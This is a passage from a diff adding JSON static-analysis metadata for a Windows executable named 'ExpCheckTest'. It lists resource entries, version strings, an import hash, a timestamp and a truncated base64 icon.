+ }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf818", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf188", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf6c8", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf578", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bfea8", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf428", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bfab8", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf2d8", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf968", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bfc08", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bfd58", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bfff8", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000c0148", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000c0298", + "size": "0x00000014", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.02" + }, + { + "name": "RT_GROUP_ICON", + "offset": "0x000b2760", + "size": "0x00000076", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "3.06" + }, + { + "name": "RT_VERSION", + "offset": "0x000beb10", + "size": "0x00000324", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.38" + } + ], + "versioninfo": [ + { + "name": "CompanyName", + "value": "" + }, + { + "name": "FileDescription", + "value": "ExpCheckTest MFC Application" + }, + { + "name": "FileVersion", + "value": "1, 0, 0, 1" + }, + { + "name": "InternalName", + "value": "ExpCheckTest" + }, + { + "name": "LegalCopyright", + "value": "Copyright (C) 2002" + }, + { + "name": "LegalTrademarks", + "value": "" + }, + { + "name": "OriginalFilename", + "value": "ExpCheckTest.EXE" + }, + { + "name": "ProductName", + "value": "ExpCheckTest Application" + }, + { + "name": "ProductVersion", + "value": "1, 0, 0, 1" + }, + { + "name": "Translation", + "value": "0x0409 0x04b0" + } + ], + "imphash": "3ecb4d4a3e34ef6ca95511f52a8b9373", + "timestamp": "2020-08-14 15:14:22", + "icon": "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